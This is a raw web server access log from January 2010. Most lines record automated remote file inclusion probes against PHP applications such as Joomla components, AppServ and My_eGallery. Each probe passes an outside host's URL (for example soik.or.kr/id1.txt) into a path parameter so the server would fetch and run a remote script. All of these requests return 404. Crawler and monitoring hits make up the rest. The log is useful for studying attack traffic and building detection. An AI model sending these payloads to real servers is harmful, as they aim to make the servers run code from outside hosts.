121.101.214.54 - - [17/Jan/2010:03:40:36 -0500] "GET /logs////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:03:40:36 -0500] "GET ////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
121.101.214.54 - - [17/Jan/2010:03:40:36 -0500] "GET /logs/access_log.Q109101700////board.php?_SERVER[DOCUMENT_ROOT]=http://schill-struemp.de/news////parse/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.181.7.62 - - [17/Jan/2010:03:41:02 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.57.93.88 - - [17/Jan/2010:03:41:47 -0500] "GET /logs/access_log.Q109112100/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.57.93.88 - - [17/Jan/2010:03:41:52 -0500] "GET /logs/access_log.Q109080600/errors.php?error=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:42:06 -0500] "GET /logs///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:42:06 -0500] "GET ///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:42:06 -0500] "GET /logs/access_log.Q109080400///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:11 -0500] "GET /appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:11 -0500] "GET /logs/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:11 -0500] "GET /logs/access_log.Q109112100%20%20/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:27 -0500] "GET /appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:27 -0500] "GET /logs/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:27 -0500] "GET /logs/access_log.Q109112100%20%20/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:34 -0500] "GET /logs/access_log.Q109080600%20%20/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:42:41 -0500] "GET /logs/access_log.Q109072700%20%20///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:42:41 -0500] "GET /logs/error_log.Q109112800%20%20///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:42:41 -0500] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:42:41 -0500] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
195.5.163.207 - - [17/Jan/2010:03:42:44 -0500] "GET /logs/access_log.Q109080600///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:42:44 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
195.5.163.207 - - [17/Jan/2010:03:42:46 -0500] "GET /logs/access_log.Q109060300///appserv/main.php?appserv_root=http://www.syforest.com/fx29id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:42:47 -0500] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:42:47 -0500] "GET /logs/error_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:42:48 -0500] "GET /logs/access_log.Q109051700///index.php?option=com_pollxt&Itemid=&mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
125.160.17.200 - - [17/Jan/2010:03:42:59 -0500] "GET /logs/access_log.Q109080600%20%20/appserv/main.php?appserv_root=http://soik.or.kr/soik///id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:43:01 -0500] "GET ///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:43:01 -0500] "GET /logs///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:43:01 -0500] "GET /logs/access_log.Q109072700///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:43:01 -0500] "GET /logs/error_log.Q109112800///bemarket/postscript/postscript.php?p_mode=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:04 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:04 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:06 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:43:07 -0500] "GET /logs/access_log.Q109092400//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:43:07 -0500] "GET /logs/error_log.Q109092500//skin/uks_gallery_v3020/setup.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:10 -0500] "GET /logs/access_log.Q109052500/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:10 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:43:15 -0500] "GET /logs/error_log.Q109071900%20%20///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
38.99.70.210 - - [17/Jan/2010:03:43:18 -0500] "GET /http://food.ukzn.ac.za/help/css/idx? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
200.93.147.154 - - [17/Jan/2010:03:43:36 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:36 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:38 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:38 -0500] "GET /logs/access_log.Q109111200/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:39 -0500] "GET /logs/access_log.Q109072300/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:43:39 -0500] "GET /logs/access_log.Q109122300%20%20///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:44 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:49 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:49 -0500] "GET /logs/access_log.Q109072300/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:50 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:50 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.142 - - [17/Jan/2010:03:43:55 -0500] "GET /images/over-index5_spat_oste.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
200.93.147.154 - - [17/Jan/2010:03:43:55 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:55 -0500] "GET /logs/access_log.Q109111200/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:43:56 -0500] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:00 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:00 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:00 -0500] "GET /logs/access_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:02 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:02 -0500] "GET /logs/access_log.Q109072300%20%20/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:02 -0500] "GET /modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
200.93.147.154 - - [17/Jan/2010:03:44:18 -0500] "GET /logs/access_log.Q109052200/modules/My_eGallery/index.php?basepath=http://www.ouk.co.kr/board//bbs/calendar/van1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:44:50 -0500] "GET /logs/access_log.Q109091700/components/com_performs/performs.php?mosConfig_absolute_path=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
38.99.70.210 - - [17/Jan/2010:03:44:56 -0500] "GET /logs/access_log.Q109122000/http://food.ukzn.ac.za/help/css/idx? HTTP/1.1" 404 260 "-" "libwww-perl/5.808"
38.99.70.210 - - [17/Jan/2010:03:44:56 -0500] "GET /http://food.ukzn.ac.za/help/css/idx? HTTP/1.1" 404 233 "-" "libwww-perl/5.808"
38.99.70.210 - - [17/Jan/2010:03:44:56 -0500] "GET /logs/http://food.ukzn.ac.za/help/css/idx? HTTP/1.1" 404 238 "-" "libwww-perl/5.808"
115.68.2.144 - - [17/Jan/2010:03:44:57 -0500] "GET /logs/error_log.Q109071900%20%20///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:45:15 -0500] "GET /logs/access_log.Q109122300%20%20///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:03:45:32 -0500] "GET /images/_notes/home_welcome_bkgrd2.gif.mno HTTP/1.0" 200 249 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.70.210 - - [17/Jan/2010:03:45:42 -0500] "GET /logs/error_log.Q109122000/http://food.ukzn.ac.za/help/css/idx? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
83.170.102.243 - - [17/Jan/2010:03:45:48 -0500] "GET /logs/access_log.Q109112200//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:45:48 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:45:48 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:45:49 -0500] "GET /logs/access_log.Q109112200//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:45:49 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:45:49 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:46:08 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:46:08 -0500] "GET /logs/error_log.Q109112700%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 299 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:46:08 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET /logs/access_log.Q109090200%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:08 -0500] "GET /logs/access_log.Q109090200%20%20//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:46:11 -0500] "GET /logs/access_log.Q109060300%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
217.131.222.234 - - [17/Jan/2010:03:46:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322)"
217.131.222.234 - - [17/Jan/2010:03:46:24 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322)"
217.131.222.234 - - [17/Jan/2010:03:46:25 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322)"
217.131.222.234 - - [17/Jan/2010:03:46:25 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322)"
83.170.102.243 - - [17/Jan/2010:03:46:40 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:40 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:40 -0500] "GET /logs/access_log.Q109090200//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:42 -0500] "GET /logs//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:42 -0500] "GET /logs/access_log.Q109090200//components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
83.170.102.243 - - [17/Jan/2010:03:46:42 -0500] "GET //components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:47:06 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:47:07 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:47:07 -0500] "GET /logs/access_log.Q109112800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
69.16.230.82 - - [17/Jan/2010:03:47:08 -0500] "GET /logs/access_log.Q109111200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fussball-brieselang.de//administrator/components/com_admin//tmpl/1.txt? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Jan/2010:03:47:54 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.195.37.174 - - [17/Jan/2010:03:47:56 -0500] "GET /logs/error_log.Q109080700 HTTP/1.0" 200 2479551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
95.108.128.242 - - [17/Jan/2010:03:47:59 -0500] "GET /logs/error_log.Q109100600 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
67.195.37.174 - - [17/Jan/2010:03:47:57 -0500] "GET /logs/error_log.Q109080700 HTTP/1.0" 200 2479551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.174 - - [17/Jan/2010:03:49:30 -0500] "GET /logs/error_log.Q109101800 HTTP/1.0" 200 4273524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.99.120.74 - - [17/Jan/2010:03:50:07 -0500] "GET /logs/access_log.Q109110200/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:50:07 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
38.99.120.74 - - [17/Jan/2010:03:50:08 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
67.195.37.174 - - [17/Jan/2010:03:49:30 -0500] "GET /logs/error_log.Q109101800 HTTP/1.0" 200 4273524 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.78.118.94 - - [17/Jan/2010:03:50:30 -0500] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:50:30 -0500] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.78.118.94 - - [17/Jan/2010:03:50:32 -0500] "GET /logs/access_log.Q109110200/historytemplate.php?cms[support]=1&cms[tngpath]=http://arda.or.th/userfiles/id1.txt??? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:50:42 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:50:42 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:50:42 -0500] "GET /logs/access_log.Q109112800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
89.111.176.66 - - [17/Jan/2010:03:50:48 -0500] "GET /logs/access_log.Q109111200///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 298 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:50:55 -0500] "GET /logs/access_log.Q109102300///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
115.68.2.144 - - [17/Jan/2010:03:50:55 -0500] "GET /logs/access_log.Q109071900///delete_all.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
66.249.68.41 - - [17/Jan/2010:03:51:37 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L014C325B119248001F9C07M+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
203.237.238.234 - - [17/Jan/2010:03:52:05 -0500] "GET //include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:52:05 -0500] "GET /logs/access_log.Q109112100//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:52:05 -0500] "GET /logs//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
203.237.238.234 - - [17/Jan/2010:03:52:14 -0500] "GET /logs/access_log.Q109060100//include/write.php?dir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
